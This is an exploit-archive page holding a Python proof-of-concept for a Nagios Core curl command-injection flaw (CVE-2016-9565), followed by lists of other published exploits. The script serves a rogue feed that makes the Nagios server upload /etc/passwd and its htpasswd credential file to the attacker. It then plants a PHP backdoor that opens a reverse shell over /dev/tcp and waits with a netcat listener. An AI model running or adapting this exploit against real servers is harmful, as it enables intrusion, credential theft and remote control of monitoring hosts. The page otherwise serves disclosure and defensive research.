"Nagios < 4.2.2 - Arbitrary Code Execution"

Author

Exploit author

"Dawid Golunski"

Platform

Exploit platform

linux

Release date

Exploit published date

2016-12-15

                
                    
                         Download file
                    
                
            
#!/usr/bin/env python

# Source: https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html

intro = """\033[94m
Nagios Core < 4.2.0 Curl Command Injection / Code Execution PoC Exploit
CVE-2016-9565
nagios_cmd_injection.py ver. 1.0

Discovered & Coded by:

Dawid Golunski
https://legalhackers.com
\033[0m
"""
usage = """
This PoC exploit can allow well-positioned attackers to extract and write 
arbitrary files on the Nagios server which can lead to arbitrary code execution
on Nagios deployments that follow the official Nagios installation guidelines. 

For details, see the full advisory at:
https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html

PoC Video:
https://legalhackers.com/videos/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html

Follow https://twitter.com/dawid_golunski for updates on this advisory.

Remember you can turn the nagios shell into root shell via CVE-2016-9565:
https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html

Usage:

./nagios_cmd_injection.py reverse_shell_ip [reverse_shell_port]

Disclaimer:
For testing purposes only. Do no harm.

"""

import os
import sys
import time
import re
import tornado.httpserver
import tornado.web
import tornado.ioloop

exploited  = 0 
docroot_rw = 0

class MainHandler(tornado.web.RequestHandler):

    def get(self):
	global exploited
	if (exploited == 1):
		self.finish()
	else:
		ua  = self.request.headers['User-Agent']
		if "Magpie" in ua:
			print "[+] Received GET request from Nagios server (%s) ! Sending redirect to inject our curl payload:\n" % self.request.remote_ip
			print  '-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '\n'
			self.redirect('https://' + self.request.host + '/nagioshack -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path, permanent=False)
			exploited = 1

    def post(self):        
        global docroot_rw
	print "[+] Success, curl payload injected! Received data back from the Nagios server %s\n" % self.request.remote_ip

	# Extract /etc/passwd from the target 
        passwd = self.request.files['passwd'][0]['body']
	print "[*] Contents of /etc/passwd file from the target:\n\n%s" % passwd

	# Extract /usr/local/nagios/etc/htpasswd.users
        htauth = self.request.files['htauth'][0]['body']
	print "[*] Contents of /usr/local/nagios/etc/htpasswd.users file:\n\n%s" % htauth

	# Extract nagios group from /etc/group
        group = self.request.files['group'][0]['body']
	for line in group.splitlines():
	    if "nagios:" in line:
		nagios_group = line
		print "[*] Retrieved nagios group line from /etc/group file on the target: %s\n" % nagios_group
	if "www-data" in nagios_group:
		print "[+] Happy days, 'www-data' user belongs to 'nagios' group! (meaning writable webroot)\n"
		docroot_rw = 1

	# Put backdoor PHP payload within the 'Server' response header so that it gets properly saved via the curl 'trace-ascii'
	# option. The output trace should contain  an unwrapped line similar to:
	# 
	# == Info: Server <?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/192.168.57.3/8080 0<&1 2>&1 &'"); ?> is not blacklisted
	#
	# which will do the trick as it won't mess up the payload :)
	self.add_header('Server', backdoor)

	# Return XML/feed with JavaScript payload that will run the backdoor code from nagios-backdoor.php via <img src=> tag :)
	print "[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :) \n"
	self.write(xmldata)

	self.finish()
	tornado.ioloop.IOLoop.instance().stop()


if __name__ == "__main__":
    global backdoor_path
    global backdoor

    print intro

    # Set attacker's external IP & port to be used by the reverse shell
    if len(sys.argv) < 2 :
	   print usage
	   sys.exit(2)
    attacker_ip   = sys.argv[1]
    if len(sys.argv) == 3 :
	   attacker_port = sys.argv[1]
    else:
	   attacker_port = 8080

    # PHP backdoor to be saved on the target Nagios server
    backdoor_path = '/usr/local/nagios/share/nagios-backdoor.php'
    backdoor = """<?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/%s/%s 0<&1 2>&1 &'"); die("stop processing"); ?>""" % (attacker_ip, attacker_port)

    # Feed XML containing JavaScript payload that will load the nagios-backdoor.php script
    global xmldata
    xmldata = """<?xml version="1.0"?>
    <rss version="2.0">
          <channel>
            <title>Nagios feed with injected JS payload</title>
            <item>
              <title>Item 1</title>
              <description>

                <strong>Feed injected. Here we go </strong> - 
                loading /nagios/nagios-backdoor.php now via img tag... check your netcat listener for nagios shell ;) 

                <img src="/nagios/nagios-backdoor.php" onerror="alert('Reverse Shell /nagios/nagios-backdoor.php executed!')">

              </description>

            </item>

          </channel>
    </rss> """


    # Generate SSL cert
    print "[+] Generating SSL certificate for our python HTTPS web server \n"
    os.system("echo -e '\n\n\n\n\n\n\n\n\n' | openssl req  -nodes -new -x509  -keyout server.key -out server.cert 2>/dev/null")

    print "[+] Starting the web server on ports 80 & 443 \n"
    application = tornado.web.Application([
        (r'/.*', MainHandler)
    ])
    application.listen(80)
    http_server = tornado.httpserver.HTTPServer(
        application, 
        ssl_options = {
            "certfile": os.path.join("./", "server.cert"),
            "keyfile": os.path.join("./", "server.key"),
        }
    )
    http_server.listen(443)

    print "[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)\n"
    tornado.ioloop.IOLoop.current().start()

    if (docroot_rw == 1):
	    print "[+] PHP backdoor should have been saved in %s on the target by now!\n" % backdoor_path
	    print "[*] Spawning netcat and waiting for the nagios shell (remember you can escalate to root via CVE-2016-9566 :)\n"
	    os.system("nc -v -l -p 8080")
	    print "\n[+] Shell closed\n"

    print "[+] That's all. Exiting\n"

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-11-27	"libupnp 1.6.18 - Stack-based buffer overflow (DoS)"	dos	linux	"Patrik Lantz"
2020-11-24	"ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)"	webapps	linux	"Giuseppe Fuggiano"
2020-10-28	"aptdaemon < 1.1.1 - File Existence Disclosure"	local	linux	"Vaisha Bernard"
2020-10-28	"PackageKit < 1.1.13 - File Existence Disclosure"	local	linux	"Vaisha Bernard"
2020-10-28	"Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion"	webapps	linux	"Ivo Palazzolo"
2020-10-28	"Blueman < 2.1.4 - Local Privilege Escalation"	local	linux	"Vaisha Bernard"
2020-09-11	"Gnome Fonts Viewer 3.34.0 - Heap Corruption"	local	linux	"Cody Winkler"
2020-07-10	"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution"	remote	linux	SpicyItalian
2020-07-06	"Grafana 7.0.1 - Denial of Service (PoC)"	dos	linux	mostwanted002

Release Date	Title	Type	Platform	Author
2017-05-11	"Vanilla Forums < 2.3 - Remote Code Execution"	remote	php	"Dawid Golunski"
2017-05-03	"WordPress < 4.7.4 - Unauthorized Password Reset"	webapps	linux	"Dawid Golunski"
2017-05-03	"WordPress 4.6 - Remote Code Execution"	webapps	linux	"Dawid Golunski"
2017-04-23	"SquirrelMail < 1.4.22 - Remote Code Execution"	remote	linux	"Dawid Golunski"
2017-01-02	"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution"	webapps	php	"Dawid Golunski"
2016-12-30	"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution"	webapps	php	"Dawid Golunski"
2016-12-28	"SwiftMailer < 5.4.5-DEV - Remote Code Execution"	webapps	php	"Dawid Golunski"
2016-12-27	"PHPMailer < 5.2.20 - Remote Code Execution"	webapps	php	"Dawid Golunski"
2016-12-26	"PHPMailer < 5.2.18 - Remote Code Execution (Bash)"	webapps	php	"Dawid Golunski"
2016-12-25	"PHPMailer < 5.2.18 - Remote Code Execution (PHP)"	webapps	php	"Dawid Golunski"
2016-12-15	"Nagios < 4.2.2 - Arbitrary Code Execution"	remote	linux	"Dawid Golunski"
2016-12-15	"Nagios < 4.2.4 - Local Privilege Escalation"	local	linux	"Dawid Golunski"
2016-11-24	"GNU Wget < 1.18 - Access List Bypass / Race Condition"	remote	multiple	"Dawid Golunski"
2016-11-16	"Nginx (Debian Based Distros + Gentoo) - 'logrotate' Local Privilege Escalation"	local	linux	"Dawid Golunski"
2016-11-01	"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' System User Privilege Escalation"	local	linux	"Dawid Golunski"
2016-11-01	"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition"	local	linux	"Dawid Golunski"
2016-10-10	"Apache Tomcat 8/7/6 (RedHat Based Distros) - Local Privilege Escalation"	local	linux	"Dawid Golunski"
2016-10-03	"Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation"	local	linux	"Dawid Golunski"
2016-09-12	"MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation"	local	linux	"Dawid Golunski"
2016-09-07	"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection"	webapps	multiple	"Dawid Golunski"
2016-08-10	"vBulletin 5.2.2 - Server-Side Request Forgery"	webapps	php	"Dawid Golunski"
2016-07-06	"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution"	remote	linux	"Dawid Golunski"
2016-05-16	"CakePHP Framework 3.2.4 - IP Spoofing"	webapps	php	"Dawid Golunski"
2016-03-10	"Exim < 4.86.2 - Local Privilege Escalation"	local	linux	"Dawid Golunski"
2015-11-07	"Google AdWords API PHP client library 6.2.0 - Arbitrary PHP Code Execution"	webapps	php	"Dawid Golunski"
2015-11-07	"eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service)"	webapps	php	"Dawid Golunski"
2015-11-07	"Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection"	webapps	php	"Dawid Golunski"
2015-10-30	"eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection"	webapps	php	"Dawid Golunski"
2015-09-22	"Kirby CMS 2.1.0 - Authentication Bypass"	webapps	php	"Dawid Golunski"
2015-09-22	"Kirby CMS 2.1.0 - Cross-Site Request Forgery / Content Upload / PHP Script Execution"	webapps	php	"Dawid Golunski"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Nagios < 4.2.2 - Arbitrary Code Execution"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.